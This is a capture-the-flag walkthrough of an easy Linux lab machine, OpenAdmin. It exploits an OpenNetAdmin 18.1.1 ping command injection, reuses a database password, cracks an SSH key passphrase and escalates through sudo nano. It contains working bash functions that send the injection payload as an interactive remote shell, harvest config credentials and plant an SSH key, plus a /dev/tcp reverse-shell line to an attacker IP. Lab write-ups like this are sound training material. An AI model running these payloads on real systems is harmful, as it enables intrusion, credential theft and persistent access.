OpenAdmin is an easy-difficulty Linux machine. It tests your knowledge of OSINT, exploitation through a publicly known exploit and basic privilege escalation using a GTFOBin.
Be sure to check out the Basic Setup section before you get started.
Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.
We have two open ports: SSH on port 22 and Apache on port 80, which serves the default Ubuntu “It works” page.
Since that page is a dead end, let’s check for any other directories that may be available:
Let’s take a look at each of the directories we have found.
We have http://openadmin.htb/artwork/ which is a business website for Arcwork:
Nothing seems to stand out at first glance and a quick view of the source reveals nothing interesting.
Navigating to http://openadmin.htb/sierra/ we see another business site called Sierra:
I am starting to think there is a theme here. Web hosting or design company?
Sierra also doesn’t show anything interesting on the site or within the source.
Taking a look at http://openadmin.htb/music/ we have another business site called SolMusic:
The first thing that catches our eye in comparison to the other sites is that this site has a Login link in the navbar.
The link takes us to http://openadmin.htb/ona/ where we come across this page:
The interesting part is the “Newer Version Available” alert, which lists version v18.1.1. Although the page never says directly what the web application is, there is also a link to `DOWNLOAD the latest version`.
The download link takes us to http://opennetadmin.com/download.html. OpenNetAdmin is a web application that keeps a database-managed inventory of your IP network:
Looks like we have found our openadmin reference and, most likely, our way in!
Let’s check whether there are any public exploits for OpenNetAdmin v18.1.1:
We find one RCE exploit. Let’s check it out and see what we have got:
Pretty straightforward. The script takes a URL as its argument and uses curl with the -d option to send HTTP POST data. That data abuses a command injection in the application’s ping function: the value that should be an IP address is passed, unsanitised, into a shell command, so arbitrary OS commands run on the server as the web server user.
Let’s go ahead and copy the contents into a file called exploit.sh and see if we can get a shell:
And make the script executable:
Now all that’s left is to give it a run:
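As an added example (mine, not the public exploit script or the author’s copy of it), here is the same mechanism written as shell functions: one builds the POST body the OpenNetAdmin ping command injection expects, one strips the command output back out of the HTML tooltip the server returns, and one ties them to curl. The xajax parameter names follow the public exploit and should be checked against the copy you downloaded; the target URL is a placeholder.

```bash
#!/bin/bash
# Added example, not the public exploit script: the OpenNetAdmin ping command
# injection as shell functions. The target URL is a placeholder.

# URL-encode the few characters that would otherwise break the POST body
# (the injected command travels inside application/x-www-form-urlencoded data).
urlencode_cmd() {  # usage: urlencode_cmd '<command>'
  printf '%s' "$1" | sed 's/%/%25/g; s/&/%26/g; s/+/%2B/g; s/#/%23/g; s/ /%20/g'
}

# Build the POST body for one command. The "ip" value of the ping tooltip is
# appended to a shell command unsanitised, so ";<cmd>" runs <cmd>. The echo
# markers let us find the output inside the HTML that comes back.
ona_payload() {  # usage: ona_payload '<command>'
  local enc; enc="$(urlencode_cmd "$1")"
  printf 'xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%%3D%%3E;echo "BEGIN";%s;echo "END"&xajaxargs[]=ping' "$enc"
}

# Keep only what sits between the BEGIN and END markers, dropping the marker
# lines themselves (the first one carries tooltip HTML in front of BEGIN).
ona_extract() {  # usage: ona_extract < response.html
  sed -n '/BEGIN/,/END/p' | sed '1d;$d'
}

# Send one command and print its output. Needs network; not exercised here.
ona_run() {  # usage: ona_run http://openadmin.htb/ona/ '<command>'
  curl --silent -d "$(ona_payload "$2")" "$1" | ona_extract
}

# Interactive loop like the public exploit's: read a command, run it, repeat.
ona_shell() {  # usage: ona_shell http://openadmin.htb/ona/
  local cmd
  while printf '$ ' && IFS= read -r cmd; do
    ona_run "$1" "$cmd"
  done
}
```

The encoding step is the only real difference from the public script: a command containing `&` or `#` would otherwise be cut short by the form parser, which is worth knowing when a payload silently "does nothing".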
We gain a shell as the www-data user, which will most likely have limited access. We will need to move to another user.
Before we do that, let’s get a netcat reverse connection so we can upgrade our shell. The nc on the target doesn’t support the -e option, so we will have to use some shell redirection instead.
First off we will set our netcat listener on our attacker machine:
We then run the following commands on the victim to receive our connection:
From here we can upgrade our shell, noting that the victim machine only has python3 installed (there is no python binary).
Now we can see what other users exist and check their home directory permissions while we are at it:
So we have two users to work with!
Because we are looking to take over another account, we will search for information leakage such as passwords and SSH keys, while keeping an eye out for a privesc to root. You just never know.
Looking at OpenNetAdmin’s files, it is obvious that the web application requires a database. A quick check shows that MySQL is running:
A web search for the term opennetadmin database password reveals where the application keeps its database credentials.
Let’s check out the file mentioned:
We find a password! Let’s give ssh a try and see if we get access:
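As an added example of the credential hunt (mine, not the author’s commands), a small grep over a web application’s config directory for PHP credential entries, plus a list of the local accounts worth trying the result against, since a database password reused for a system account is exactly what we are hoping for. The config file in demo() is constructed, and its key names (db_login, db_passwd) are an assumption modelled on typical PHP database config arrays; read the real file on the target.

```bash
#!/bin/bash
# Added example: pull credential-looking entries out of a web app's PHP config
# and list the local accounts they might be reused against. The config file in
# demo() is constructed; its key names are assumed, not taken from the page.

# Print key=value for PHP array entries whose key looks like a credential.
find_db_creds() {  # usage: find_db_creds <directory>
  grep -rhoE "'(db_(host|login|passwd|database)|password|passwd|pass)'[[:space:]]*=>[[:space:]]*'[^']*'" "$1" 2>/dev/null \
    | sed -E "s/^'([^']+)'[[:space:]]*=>[[:space:]]*'([^']*)'$/\1=\2/"
}

# Accounts with a real login shell: the ones worth trying the password on.
shell_users() {  # usage: shell_users [passwd-file]
  awk -F: '$7 ~ /sh$/ {print $1}' "${1:-/etc/passwd}"
}

# Constructed config in a temp dir so the function can be exercised offline.
demo() {
  local d; d="$(mktemp -d)"
  mkdir -p "$d/local/config"
  cat > "$d/local/config/db_settings.inc.php" <<'EOF'
<?php
$contexts = array (
  'DEFAULT' => array (
    'databases' => array (
      0 => array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'dbuser',
        'db_passwd' => 'example_only',
        'db_database' => 'appdb',
      ),
    ),
  ),
);
EOF
  find_db_creds "$d"
  rm -rf "$d"
}
```

On the target you would run `find_db_creds /opt/ona` (or wherever the application lives) and then try each value from `shell_users` over SSH.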
Inspecting jimmy’s home folder, we see that there is no user.txt file, so we are going to need to gain access to joanna’s account.
Let’s see where jimmy has read and write access:
Taking a look at these files, we see that index.php is a login page that accepts jimmy’s username and password, and that main.php contains shell_exec('cat /home/joanna/.ssh/id_rsa');, which outputs joanna’s SSH key. That is exactly what we are after. We also see Don't forget your "ninja" password. Don’t worry, we won’t ;)
These files aren’t under http://openadmin.htb’s document root. Maybe there is a vhost pointing at this location that we haven’t found yet? Let’s check the Apache config:
There it is! Taking a look at internal.conf we find what we are looking for:
We see that Apache is listening on 127.0.0.1:52846, and a quick curl -u jimmy:n1....0R! 127.0.0.1:52846 outputs the contents of index.php.
Running main.php we see that joanna’s SSH key is printed:
Path 1 - SSH Key
Since we have joanna’s SSH key, and it is passphrase-protected, we can try cracking the passphrase. Copy the key to a file on the attacker machine such as id_rsa.
We then convert the key to a crackable hash (ssh2john, which ships with John the Ripper, does this):
We can then try cracking it with john:
NOTE: I don’t use just rockyou.txt. passwords.txt is a custom wordlist built from multiple wordlists with all duplicates removed. You may need to do the same!
We retrieve the SSH passphrase bl....as and can now login via SSH using the id_rsa key:
Path 2 - Alter Script
The script runs commands as joanna, so all we have to do is make it spawn a shell.
So we edit main.php and replace cat /home/joanna/.ssh/id_rsa with /bin/bash -c 'bash -i >& /dev/tcp/<attacker-ip>/1234 0>&1'.
Then we setup our netcat listener on our attacker machine:
Now let’s run main.php again, logging in with jimmy’s username and password:
Back at our listener we should receive a connection:
Now we can go for our user flag:
And there we have it! We have our user.txt.
Let’s check to see if we have any sudo privileges.
If we took Path 2 and altered the script, we find that we receive the following error:
We can create an SSH key pair, drop the public key into /home/joanna/.ssh/authorized_keys and then log in via SSH instead.
We see that we can run nano with sudo, and without a password, to open the file /opt/priv. Since nano is a GTFOBin, we will be able to gain root.
To do so we open the file with sudo nano /opt/priv, then press Ctrl+R followed by Ctrl+X to bring up the “Command to execute” prompt. We then type reset; sh 1>&0 2>&0 like so:
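The key drop, as an added example (mine, not the author’s commands), done carefully: sshd with the default StrictModes ignores authorized_keys when ~/.ssh or the file itself is group- or world-writable, which is the usual reason this step "doesn’t work" from a reverse shell, so the modes are set explicitly. Key type and comment are my choices; the home directory is a parameter so the function can be exercised on a temp dir.

```bash
#!/bin/bash
# Added example: install an attacker public key for joanna with modes sshd
# accepts. Key type/comment are my choices; home dir is a parameter.

# Attacker side: generate an ed25519 pair without a passphrase (lab use only).
# Not run by the demo; shown for the attacker step.
gen_key() {  # usage: gen_key <path>
  ssh-keygen -t ed25519 -N '' -f "$1" -C 'attacker' >/dev/null
}

# Target side: append one public key line with sshd-acceptable permissions,
# without duplicating a key that is already present.
install_pubkey() {  # usage: install_pubkey <home-dir> '<public key line>'
  local home="$1" pub="$2"
  mkdir -p "$home/.ssh" && chmod 700 "$home/.ssh"
  if ! grep -qxF -- "$pub" "$home/.ssh/authorized_keys" 2>/dev/null; then
    printf '%s\n' "$pub" >> "$home/.ssh/authorized_keys"
  fi
  chmod 600 "$home/.ssh/authorized_keys"
}

# Octal mode of a path, portable between GNU and BSD stat, for checking.
mode_of() {  # usage: mode_of <path>
  if stat -c '%a' "$1" >/dev/null 2>&1; then stat -c '%a' "$1"; else stat -f '%Lp' "$1"; fi
}
```

From the reverse shell: `install_pubkey /home/joanna "$(cat id_ed25519.pub)"` with the key pasted in, then from the attacker `ssh -i id_ed25519 joanna@openadmin.htb`, which gives a proper terminal for sudo.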
That was a nice and easy root :)
This was an interesting machine with a fair few websites that could have sent some people on a wild goose chase. Focusing on important links like logins can be fruitful. Misconfigurations and outdated software can easily lead to a compromise in the real world. The privilege escalation to root once again highlights the problem with “ease of use” shortcuts such as sudo without a password. Sadly this is a common real-world situation where people try to automate a task whose script needs elevated privileges.